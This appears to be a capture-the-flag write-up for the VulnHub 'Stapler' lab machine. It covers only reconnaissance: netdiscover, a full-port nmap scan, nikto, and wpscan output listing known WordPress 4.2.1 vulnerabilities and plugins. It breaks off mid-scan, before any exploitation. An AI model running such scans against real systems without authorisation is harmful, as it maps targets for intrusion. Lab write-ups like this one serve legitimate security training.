.        :     .,::      .::::::::-.  
;;,.    ;;;    `;;;,  .,;;  ;;,   `';,
[[[[, ,[[[[,     '[[,,[['   `[[     [[
$$$$$$$$"$$$      Y$$$P      $$,    $$
888 Y88" 888o   oP"``"Yo,    888_,o8P'
MMM  M'  "MMM,m"       "Mm,  MMMMP"`  

[VulnHub] Stapler Writeup

This writeup shows the methods I used to attack and gain root access to the Stapler: 1 challenge from VulnHub.com. The goal of this vulnerable machine is to get root access and to read the contents of flag.txt. We are informed that there are at least 2 ways to get limited access and at least 3 different ways to get root. Lets see what we can find.

To start off I ran netdiscover to locate the IP Address of the Stapler virtual machine.

netdiscover -r 192.168.1.0/24

Currently scanning: Finished!   |   Screen View: Unique Hosts                 
                                                                               
 2 Captured ARP Req/Rep packets, from 2 hosts.   Total size: 120               
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.1.1     08:00:27:e0:5b:39      1      60  Cadmus Computer Systems     
 192.168.1.119   08:00:27:05:8b:0f      1      60  Cadmus Computer Systems

Now that I have the IP Address (192.168.1.119) of the machine that I’m attacking, I run an nmap scan against all TCP ports on the target.

nmap -p 1-65535 -T5 -A -v 192.168.1.119

Starting Nmap 7.12 ( https://nmap.org ) at 2016-06-21 21:49 EDT
NSE: Loaded 138 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 21:49
Completed NSE at 21:49, 0.00s elapsed
Initiating NSE at 21:49
Completed NSE at 21:49, 0.00s elapsed
Initiating ARP Ping Scan at 21:49
Scanning 192.168.1.119 [1 port]
Completed ARP Ping Scan at 21:49, 0.03s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 21:49
Completed Parallel DNS resolution of 1 host. at 21:50, 13.01s elapsed
Initiating SYN Stealth Scan at 21:50
Scanning 192.168.1.119 [65535 ports]
Discovered open port 3306/tcp on 192.168.1.119
Discovered open port 53/tcp on 192.168.1.119
Discovered open port 22/tcp on 192.168.1.119
Discovered open port 21/tcp on 192.168.1.119
Discovered open port 139/tcp on 192.168.1.119
Discovered open port 80/tcp on 192.168.1.119
SYN Stealth Scan Timing: About 45.53% done; ETC: 21:51 (0:00:37 remaining)
Discovered open port 666/tcp on 192.168.1.119
Discovered open port 12380/tcp on 192.168.1.119
Completed SYN Stealth Scan at 21:51, 55.06s elapsed (65535 total ports)
Initiating Service scan at 21:51
Scanning 8 services on 192.168.1.119
Completed Service scan at 21:51, 18.56s elapsed (8 services on 1 host)
Initiating OS detection (try #1) against 192.168.1.119
NSE: Script scanning 192.168.1.119.
Initiating NSE at 21:51
NSE: [ftp-bounce] Couldn't resolve scanme.nmap.org, scanning 10.0.0.1 instead.
Completed NSE at 21:52, 46.29s elapsed
Initiating NSE at 21:52
Completed NSE at 21:52, 1.01s elapsed
Nmap scan report for 192.168.1.119
Host is up (0.00024s latency).
Not shown: 65523 filtered ports
PORT      STATE  SERVICE     VERSION
20/tcp    closed ftp-data
21/tcp    open   ftp         vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: Can't parse PASV response: "Permission denied."
22/tcp    open   ssh         OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 81:21:ce:a1:1a:05:b1:69:4f:4d:ed:80:28:e8:99:05 (RSA)
|_  256 5b:a5:bb:67:91:1a:51:c2:d3:21:da:c0:ca:f0:db:9e (ECDSA)
53/tcp    open   domain      dnsmasq 2.75
| dns-nsid: 
|_  bind.version: dnsmasq-2.75
80/tcp    open   http
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: 404 Not Found
123/tcp   closed ntp
137/tcp   closed netbios-ns
138/tcp   closed netbios-dgm
139/tcp   open   netbios-ssn Samba smbd 3.X (workgroup: RED)
666/tcp   open   doom?
3306/tcp  open   mysql       MySQL 5.7.12-0ubuntu1
| mysql-info: 
|   Protocol: 53
|   Version: .7.12-0ubuntu1
|   Thread ID: 7
|   Capabilities flags: 63487
|   Some Capabilities: ConnectWithDatabase, SupportsLoadDataLocal, SupportsTransactions, SupportsCompression, ODBCClient, DontAllowDatabaseTableColumn, LongPassword, IgnoreSpaceBeforeParenthesis, LongColumnFlag, Speaks41ProtocolOld, IgnoreSigpipes, InteractiveClient, FoundRows, Speaks41ProtocolNew, Support41Auth
|   Status: Autocommit
|_  Salt: 0r\x0EBi\x05!\x1A\x0E^	`SyP8`%CH
12380/tcp open   http        Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Tim, we need to-do better next year for Initech
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port80-TCP:V=7.12%I=7%D=6/21%Time=5769EF11%P=x86_64-pc-linux-gnu%r(GetR
SF:equest,27F,"HTTP/1\.0\x20404\x20Not\x20Found\r\nConnection:\x20close\r\
SF:nContent-Type:\x20text/html;\x20charset=UTF-8\r\nContent-Length:\x20533
SF:\r\n\r\n<!doctype\x20html><html><head><title>404\x20Not\x20Found</title
SF:><style>\nbody\x20{\x20background-color:\x20#fcfcfc;\x20color:\x20#3333
SF:33;\x20margin:\x200;\x20padding:0;\x20}\nh1\x20{\x20font-size:\x201\.5e
SF:m;\x20font-weight:\x20normal;\x20background-color:\x20#9999cc;\x20min-h
SF:eight:2em;\x20line-height:2em;\x20border-bottom:\x201px\x20inset\x20bla
SF:ck;\x20margin:\x200;\x20}\nh1,\x20p\x20{\x20padding-left:\x2010px;\x20}
SF:\ncode\.url\x20{\x20background-color:\x20#eeeeee;\x20font-family:monosp
SF:ace;\x20padding:0\x202px;}\n</style>\n</head><body><h1>Not\x20Found</h1
SF:><p>The\x20requested\x20resource\x20<code\x20class=\"url\">/</code>\x20
SF:was\x20not\x20found\x20on\x20this\x20server\.</p></body></html>")%r(HTT
SF:POptions,27F,"HTTP/1\.0\x20404\x20Not\x20Found\r\nConnection:\x20close\
SF:r\nContent-Type:\x20text/html;\x20charset=UTF-8\r\nContent-Length:\x205
SF:33\r\n\r\n<!doctype\x20html><html><head><title>404\x20Not\x20Found</tit
SF:le><style>\nbody\x20{\x20background-color:\x20#fcfcfc;\x20color:\x20#33
SF:3333;\x20margin:\x200;\x20padding:0;\x20}\nh1\x20{\x20font-size:\x201\.
SF:5em;\x20font-weight:\x20normal;\x20background-color:\x20#9999cc;\x20min
SF:-height:2em;\x20line-height:2em;\x20border-bottom:\x201px\x20inset\x20b
SF:lack;\x20margin:\x200;\x20}\nh1,\x20p\x20{\x20padding-left:\x2010px;\x2
SF:0}\ncode\.url\x20{\x20background-color:\x20#eeeeee;\x20font-family:mono
SF:space;\x20padding:0\x202px;}\n</style>\n</head><body><h1>Not\x20Found</
SF:h1><p>The\x20requested\x20resource\x20<code\x20class=\"url\">/</code>\x
SF:20was\x20not\x20found\x20on\x20this\x20server\.</p></body></html>")%r(F
SF:ourOhFourRequest,2A2,"HTTP/1\.0\x20404\x20Not\x20Found\r\nConnection:\x
SF:20close\r\nContent-Type:\x20text/html;\x20charset=UTF-8\r\nContent-Leng
SF:th:\x20568\r\n\r\n<!doctype\x20html><html><head><title>404\x20Not\x20Fo
SF:und</title><style>\nbody\x20{\x20background-color:\x20#fcfcfc;\x20color
SF::\x20#333333;\x20margin:\x200;\x20padding:0;\x20}\nh1\x20{\x20font-size
SF::\x201\.5em;\x20font-weight:\x20normal;\x20background-color:\x20#9999cc
SF:;\x20min-height:2em;\x20line-height:2em;\x20border-bottom:\x201px\x20in
SF:set\x20black;\x20margin:\x200;\x20}\nh1,\x20p\x20{\x20padding-left:\x20
SF:10px;\x20}\ncode\.url\x20{\x20background-color:\x20#eeeeee;\x20font-fam
SF:ily:monospace;\x20padding:0\x202px;}\n</style>\n</head><body><h1>Not\x2
SF:0Found</h1><p>The\x20requested\x20resource\x20<code\x20class=\"url\">/n
SF:ice%20ports%2C/Tri%6Eity\.txt%2ebak</code>\x20was\x20not\x20found\x20on
SF:\x20this\x20server\.</p></body></html>");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port666-TCP:V=7.12%I=7%D=6/21%Time=5769EF0B%P=x86_64-pc-linux-gnu%r(NUL
SF:L,2D58,"PK\x03\x04\x14\0\x02\0\x08\0d\x80\xc3Hp\xdf\x15\x81\xaa,\0\0\x1
SF:52\0\0\x0c\0\x1c\0message2\.jpgUT\t\0\x03\+\x9cQWJ\x9cQWux\x0b\0\x01\x0
SF:4\xf5\x01\0\0\x04\x14\0\0\0\xadz\x0bT\x13\xe7\xbe\xefP\x94\x88\x88A@\xa
SF:2\x20\x19\xabUT\xc4T\x11\xa9\x102>\x8a\xd4RDK\x15\x85Jj\xa9\"DL\[E\xa2\
SF:x0c\x19\x140<\xc4\xb4\xb5\xca\xaen\x89\x8a\x8aV\x11\x91W\xc5H\x20\x0f\x
SF:b2\xf7\xb6\x88\n\x82@%\x99d\xb7\xc8#;3\[\r_\xcddr\x87\xbd\xcf9\xf7\xaeu
SF:\xeeY\xeb\xdc\xb3oX\xacY\xf92\xf3e\xfe\xdf\xff\xff\xff=2\x9f\xf3\x99\xd
SF:3\x08y}\xb8a\xe3\x06\xc8\xc5\x05\x82>`\xfe\x20\xa7\x05:\xb4y\xaf\xf8\xa
SF:0\xf8\xc0\^\xf1\x97sC\x97\xbd\x0b\xbd\xb7nc\xdc\xa4I\xd0\xc4\+j\xce\[\x
SF:87\xa0\xe5\x1b\xf7\xcc=,\xce\x9a\xbb\xeb\xeb\xdds\xbf\xde\xbd\xeb\x8b\x
SF:f4\xfdis\x0f\xeeM\?\xb0\xf4\x1f\xa3\xcceY\xfb\xbe\x98\x9b\xb6\xfb\xe0\x
SF:dc\]sS\xc5bQ\xfa\xee\xb7\xe7\xbc\x05AoA\x93\xfe9\xd3\x82\x7f\xcc\xe4\xd
SF:5\x1dx\xa2O\x0e\xdd\x994\x9c\xe7\xfe\x871\xb0N\xea\x1c\x80\xd63w\xf1\xa
SF:f\xbd&&q\xf9\x97'i\x85fL\x81\xe2\\\xf6\xb9\xba\xcc\x80\xde\x9a\xe1\xe2:
SF:\xc3\xc5\xa9\x85`\x08r\x99\xfc\xcf\x13\xa0\x7f{\xb9\xbc\xe5:i\xb2\x1bk\
SF:x8a\xfbT\x0f\xe6\x84\x06/\xe8-\x17W\xd7\xb7&\xb9N\x9e<\xb1\\\.\xb9\xcc\
SF:xe7\xd0\xa4\x19\x93\xbd\xdf\^\xbe\xd6\xcdg\xcb\.\xd6\xbc\xaf\|W\x1c\xfd
SF:\xf6\xe2\x94\xf9\xebj\xdbf~\xfc\x98x'\xf4\xf3\xaf\x8f\xb9O\xf5\xe3\xcc\
SF:x9a\xed\xbf`a\xd0\xa2\xc5KV\x86\xad\n\x7fou\xc4\xfa\xf7\xa37\xc4\|\xb0\
SF:xf1\xc3\x84O\xb6nK\xdc\xbe#\)\xf5\x8b\xdd{\xd2\xf6\xa6g\x1c8\x98u\(\[r\
SF:xf8H~A\xe1qYQq\xc9w\xa7\xbe\?}\xa6\xfc\x0f\?\x9c\xbdTy\xf9\xca\xd5\xaak
SF:\xd7\x7f\xbcSW\xdf\xd0\xd8\xf4\xd3\xddf\xb5F\xabk\xd7\xff\xe9\xcf\x7fy\
SF:xd2\xd5\xfd\xb4\xa7\xf7Y_\?n2\xff\xf5\xd7\xdf\x86\^\x0c\x8f\x90\x7f\x7f
SF:\xf9\xea\xb5m\x1c\xfc\xfef\"\.\x17\xc8\xf5\?B\xff\xbf\xc6\xc5,\x82\xcb\
SF:[\x93&\xb9NbM\xc4\xe5\xf2V\xf6\xc4\t3&M~{\xb9\x9b\xf7\xda-\xac\]_\xf9\x
SF:cc\[qt\x8a\xef\xbao/\xd6\xb6\xb9\xcf\x0f\xfd\x98\x98\xf9\xf9\xd7\x8f\xa
SF:7\xfa\xbd\xb3\x12_@N\x84\xf6\x8f\xc8\xfe{\x81\x1d\xfb\x1fE\xf6\x1f\x81\
SF:xfd\xef\xb8\xfa\xa1i\xae\.L\xf2\\g@\x08D\xbb\xbfp\xb5\xd4\xf4Ym\x0bI\x9
SF:6\x1e\xcb\x879-a\)T\x02\xc8\$\x14k\x08\xae\xfcZ\x90\xe6E\xcb<C\xcap\x8f
SF:\xd0\x8f\x9fu\x01\x8dvT\xf0'\x9b\xe4ST%\x9f5\x95\xab\rSWb\xecN\xfb&\xf4
SF:\xed\xe3v\x13O\xb73A#\xf0,\xd5\xc2\^\xe8\xfc\xc0\xa7\xaf\xab4\xcfC\xcd\
SF:x88\x8e}\xac\x15\xf6~\xc4R\x8e`wT\x96\xa8KT\x1cam\xdb\x99f\xfb\n\xbc\xb
SF:cL}AJ\xe5H\x912\x88\(O\0k\xc9\xa9\x1a\x93\xb8\x84\x8fdN\xbf\x17\xf5\xf0
SF:\.npy\.9\x04\xcf\x14\x1d\x89Rr9\xe4\xd2\xae\x91#\xfbOg\xed\xf6\x15\x04\
SF:xf6~\xf1\]V\xdcBGu\xeb\xaa=\x8e\xef\xa4HU\x1e\x8f\x9f\x9bI\xf4\xb6GTQ\x
SF:f3\xe9\xe5\x8e\x0b\x14L\xb2\xda\x92\x12\xf3\x95\xa2\x1c\xb3\x13\*P\x11\
SF:?\xfb\xf3\xda\xcaDfv\x89`\xa9\xe4k\xc4S\x0e\xd6P0");
MAC Address: 08:00:27:05:8B:0F (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.4
Uptime guess: 0.026 days (since Tue Jun 21 21:14:25 2016)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=264 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| nbstat: NetBIOS name: RED, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
|   RED<00>              Flags: <unique><active>
|   RED<03>              Flags: <unique><active>
|   RED<20>              Flags: <unique><active>
|   \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
|   WORKGROUP<00>        Flags: <group><active>
|   WORKGROUP<1d>        Flags: <unique><active>
|_  WORKGROUP<1e>        Flags: <group><active>
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.9-Ubuntu)
|   Computer name: red
|   NetBIOS computer name: RED
|   Domain name: 
|   FQDN: red
|_  System time: 2016-06-10T17:00:37+01:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server supports SMBv2 protocol

TRACEROUTE
HOP RTT     ADDRESS
1   0.24 ms 192.168.1.119

NSE: Script Post-scanning.
Initiating NSE at 21:52
Completed NSE at 21:52, 0.00s elapsed
Initiating NSE at 21:52
Completed NSE at 21:52, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 136.02 seconds
           Raw packets sent: 131126 (5.771MB) | Rcvd: 64 (3.116KB)

Looks like there is an Apache server running on port 12380, lets feed that address/port combo into nikto and see what it finds.

nikto -host 192.168.1.119:12380

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.119
+ Target Hostname:    192.168.1.119
+ Target Port:        12380
---------------------------------------------------------------------------
+ SSL Info:        Subject:  /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost
                   Ciphers:  ECDHE-RSA-AES256-GCM-SHA384
                   Issuer:   /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost
+ Start Time:         2016-06-22 00:11:17 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0x15 0x5347c53a972d1 
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'dave' found, with contents: Soemthing doesn't look right here
+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/admin112233/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/blogblog/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 2 entries which should be manually viewed.
+ Hostname '192.168.1.119' does not match certificate's names: Red.Initech
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ Uncommon header 'x-ob_mode' found, with contents: 1
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 7690 requests: 0 error(s) and 14 item(s) reported on remote host
+ End Time:           2016-06-22 00:14:17 (GMT-4) (180 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Nikto’s results show that SSL is enabled on the Apache server and that there are some interesting directories available (“/admin112233/”, “/blogblog/”,”/phpmyadmin/”). Now that I am done with the automated enumeration phase it’s time to take a look at these directories using Firefox to see what they offer. Connecting to “https://192.168.1.119:12380/phpmyadmin/” presents a phpMyAdmin login page and “https://192.168.1.119:12380/blogblog/” appears to be a WordPress blog for the Initech company.

After poking around on the blog and looking for typical WordPress directories I am convinced that this is a legit WordPress blog and not one of the many tricks that Stapler has to offer. Time to run WPScan against the blog for a more thorough enumeration of its WordPress version information as well as available plugins and themes that are running on the site.

wpscan --url https://192.168.1.119:12380/blogblog/ --enumerate ap --enumerate at

___________________________________________
        __          _______   _____                  
        \ \        / /  __ \ / ____|                 
         \ \  /\  / /| |__) | (___   ___  __ _ _ __  
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \ 
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team 
                       Version 2.9.1
          Sponsored by Sucuri - https://sucuri.net
   @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________

[+] URL: https://192.168.1.119:12380/blogblog/
[+] Started: Thu Jun 23 05:33:19 2016

[!] The WordPress 'https://192.168.1.119:12380/blogblog/readme.html' file exists exposing a version number
[+] Interesting header: DAVE: Soemthing doesn't look right here
[+] Interesting header: SERVER: Apache/2.4.18 (Ubuntu)
[!] Registration is enabled: https://192.168.1.119:12380/blogblog/wp-login.php?action=register
[+] XML-RPC Interface available under: https://192.168.1.119:12380/blogblog/xmlrpc.php
[!] Upload directory has directory listing enabled: https://192.168.1.119:12380/blogblog/wp-content/uploads/
[!] Includes directory has directory listing enabled: https://192.168.1.119:12380/blogblog/wp-includes/

[+] WordPress version 4.2.1 identified from advanced fingerprinting (Released on 2015-04-27)
[!] 21 vulnerabilities identified from the version number

[!] Title: WordPress 4.1-4.2.1 - Genericons Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/7979
    Reference: https://codex.wordpress.org/Version_4.2.2
[i] Fixed in: 4.2.2

[!] Title: WordPress <= 4.2.2 - Authenticated Stored Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/8111
    Reference: https://wordpress.org/news/2015/07/wordpress-4-2-3/
    Reference: https://twitter.com/klikkioy/status/624264122570526720
    Reference: https://klikki.fi/adv/wordpress3.html
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5622
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5623
[i] Fixed in: 4.2.3

[!] Title: WordPress <= 4.2.3 - wp_untrash_post_comments SQL Injection 
    Reference: https://wpvulndb.com/vulnerabilities/8126
    Reference: https://github.com/WordPress/WordPress/commit/70128fe7605cb963a46815cf91b0a5934f70eff5
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2213
[i] Fixed in: 4.2.4

[!] Title: WordPress <= 4.2.3 - Timing Side Channel Attack
    Reference: https://wpvulndb.com/vulnerabilities/8130
    Reference: https://core.trac.wordpress.org/changeset/33536
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5730
[i] Fixed in: 4.2.4

[!] Title: WordPress <= 4.2.3 - Widgets Title Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/8131
    Reference: https://core.trac.wordpress.org/changeset/33529
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5732
[i] Fixed in: 4.2.4

[!] Title: WordPress <= 4.2.3 - Nav Menu Title Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/8132
    Reference: https://core.trac.wordpress.org/changeset/33541
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5733
[i] Fixed in: 4.2.4

[!] Title: WordPress <= 4.2.3 - Legacy Theme Preview Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/8133
    Reference: https://core.trac.wordpress.org/changeset/33549
    Reference: https://blog.sucuri.net/2015/08/persistent-xss-vulnerability-in-wordpress-explained.html
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5734
[i] Fixed in: 4.2.4

[!] Title: WordPress <= 4.3 - Authenticated Shortcode Tags Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/8186
    Reference: https://wordpress.org/news/2015/09/wordpress-4-3-1/
    Reference: http://blog.checkpoint.com/2015/09/15/finding-vulnerabilities-in-core-wordpress-a-bug-hunters-trilogy-part-iii-ultimatum/
    Reference: http://blog.knownsec.com/2015/09/wordpress-vulnerability-analysis-cve-2015-5714-cve-2015-5715/
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5714
[i] Fixed in: 4.2.5

[!] Title: WordPress <= 4.3 - User List Table Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/8187
    Reference: https://wordpress.org/news/2015/09/wordpress-4-3-1/
    Reference: https://github.com/WordPress/WordPress/commit/f91a5fd10ea7245e5b41e288624819a37adf290a
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7989
[i] Fixed in: 4.2.5

[!] Title: WordPress <= 4.3 - Publish Post and Mark as Sticky Permission Issue
    Reference: https://wpvulndb.com/vulnerabilities/8188
    Reference: https://wordpress.org/news/2015/09/wordpress-4-3-1/
    Reference: http://blog.checkpoint.com/2015/09/15/finding-vulnerabilities-in-core-wordpress-a-bug-hunters-trilogy-part-iii-ultimatum/
    Reference: http://blog.knownsec.com/2015/09/wordpress-vulnerability-analysis-cve-2015-5714-cve-2015-5715/
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5715
[i] Fixed in: 4.2.5

[!] Title: WordPress  3.7-4.4 - Authenticated Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/8358
    Reference: https://wordpress.org/news/2016/01/wordpress-4-4-1-security-and-maintenance-release/
    Reference: https://github.com/WordPress/WordPress/commit/7ab65139c6838910426567849c7abed723932b87
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1564
[i] Fixed in: 4.2.6

[!] Title: WordPress 3.7-4.4.1 - Local URIs Server Side Request Forgery (SSRF)
    Reference: https://wpvulndb.com/vulnerabilities/8376
    Reference: https://wordpress.org/news/2016/02/wordpress-4-4-2-security-and-maintenance-release/
    Reference: https://core.trac.wordpress.org/changeset/36435
    Reference: https://hackerone.com/reports/110801
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2222
[i] Fixed in: 4.2.7

[!] Title: WordPress 3.7-4.4.1 - Open Redirect
    Reference: https://wpvulndb.com/vulnerabilities/8377
    Reference: https://wordpress.org/news/2016/02/wordpress-4-4-2-security-and-maintenance-release/
    Reference: https://core.trac.wordpress.org/changeset/36444
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2221
[i] Fixed in: 4.2.7

[!] Title: WordPress <= 4.4.2 - SSRF Bypass using Octal & Hexedecimal IP addresses
    Reference: https://wpvulndb.com/vulnerabilities/8473
    Reference: https://codex.wordpress.org/Version_4.5
    Reference: https://github.com/WordPress/WordPress/commit/af9f0520875eda686fd13a427fd3914d7aded049
[i] Fixed in: 4.5

[!] Title: WordPress <= 4.4.2 - Reflected XSS in Network Settings
    Reference: https://wpvulndb.com/vulnerabilities/8474
    Reference: https://codex.wordpress.org/Version_4.5
    Reference: https://github.com/WordPress/WordPress/commit/cb2b3ed3c7d68f6505bfb5c90257e6aaa3e5fcb9
[i] Fixed in: 4.5

[!] Title: WordPress <= 4.4.2 - Script Compression Option CSRF
    Reference: https://wpvulndb.com/vulnerabilities/8475
    Reference: https://codex.wordpress.org/Version_4.5
[i] Fixed in: 4.5

[!] Title: WordPress 4.2-4.5.1 - MediaElement.js Reflected Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/8488
    Reference: https://wordpress.org/news/2016/05/wordpress-4-5-2/
    Reference: https://github.com/WordPress/WordPress/commit/a493dc0ab5819c8b831173185f1334b7c3e02e36
    Reference: https://gist.github.com/cure53/df34ea68c26441f3ae98f821ba1feb9c
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4567
[i] Fixed in: 4.5.2

[!] Title: WordPress <= 4.5.1 - Pupload Same Origin Method Execution (SOME)
    Reference: https://wpvulndb.com/vulnerabilities/8489
    Reference: https://wordpress.org/news/2016/05/wordpress-4-5-2/
    Reference: https://github.com/WordPress/WordPress/commit/c33e975f46a18f5ad611cf7e7c24398948cecef8
    Reference: https://gist.github.com/cure53/09a81530a44f6b8173f545accc9ed07e
    Reference: http://avlidienbrunn.com/wp_some_loader.php
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4566
[i] Fixed in: 4.2.8

[!] Title: WordPress 4.2-4.5.2 - Authenticated Attachment Name Stored XSS
    Reference: https://wpvulndb.com/vulnerabilities/8518
    Reference: https://wordpress.org/news/2016/06/wordpress-4-5-3/
    Reference: https://github.com/WordPress/WordPress/commit/4372cdf45d0f49c74bbd4d60db7281de83e32648
[i] Fixed in: 4.5.3

[!] Title: WordPress 3.6-4.5.2 - Authenticated Revision History Information Disclosure
    Reference: https://wpvulndb.com/vulnerabilities/8519
    Reference: https://wordpress.org/news/2016/06/wordpress-4-5-3/
    Reference: https://github.com/WordPress/WordPress/commit/a2904cc3092c391ac7027bc87f7806953d1a25a1
    Reference: https://www.wordfence.com/blog/2016/06/wordpress-core-vulnerability-bypass-password-protected-posts/
[i] Fixed in: 4.5.3

[!] Title: WordPress 2.6.0-4.5.2 - Unauthorized Category Removal from Post
    Reference: https://wpvulndb.com/vulnerabilities/8520
    Reference: https://wordpress.org/news/2016/06/wordpress-4-5-3/
    Reference: https://github.com/WordPress/WordPress/commit/6d05c7521baa980c4efec411feca5e7fab6f307c
[i] Fixed in: 4.5.3

[+] WordPress theme in use: bhost - v1.2.9

[+] Name: bhost - v1.2.9
 |  Latest version: 1.2.9 (up to date)
 |  Location: https://192.168.1.119:12380/blogblog/wp-content/themes/bhost/
 |  Readme: https://192.168.1.119:12380/blogblog/wp-content/themes/bhost/readme.txt
 |  Style URL: https://192.168.1.119:12380/blogblog/wp-content/themes/bhost/style.css
 |  Theme Name: BHost
 |  Theme URI: Author: Masum Billah
 |  Description: Bhost is a nice , clean , beautifull, Responsive and modern design free WordPress Theme. This the...
 |  Author: Masum Billah
 |  Author URI: http://getmasum.net/

[+] Enumerating plugins from passive detection ...
[+] No plugins found

[+] Enumerating all plugins (may take a while and use a lot of system resources) ...

   Time: 00:04:39 <=====================> (60690 / 60690) 100.00% Time: 00:04:39

[+] We found 4 plugins:

[+] Name: advanced-video-embed-embed-videos-or-playlists - v1.0
 |  Latest version: 1.0 (up to date)
 |  Location: https://192.168.1.119:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/
 |  Readme: https://192.168.1.119:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/readme.txt
[!] Directory listing is enabled: https://192.168.1.119:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/

[+] Name: akismet
 |  Latest version: 3.1.11 
 |  Location: https://192.168.1.119:12380/blogblog/wp-content/plugins/akismet/

[!] We could not determine a version so all vulnerabilities are printed out

[!] Title: Akismet 2.5.0-3.1.4 - Unauthenticated Stored Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/8215
    Reference: http://blog.akismet.com/2015/10/13/akismet-3-1-5-wordpress/
    Reference: https://blog.sucuri.net/2015/10/security-advisory-stored-xss-in-akismet-wordpress-plugin.html
[i] Fixed in: 3.1.5

[+] Name: shortcode-ui - v0.6.2
 |  Latest version: 0.6.2 (up to date)
 |  Location: https://192.168.1.119:12380/blogblog/wp-content/plugins/shortcode-ui/
 |  Readme: https://192.168.1.119:12380/blogblog/wp-content/plugins/shortcode-ui/readme.txt
[!] Directory listing is enabled: https://192.168.1.119:12380/blogblog/wp-content/plugins/shortcode-ui/

[+] Name: two-factor
 |  Latest version: 0.1-dev-20160412 
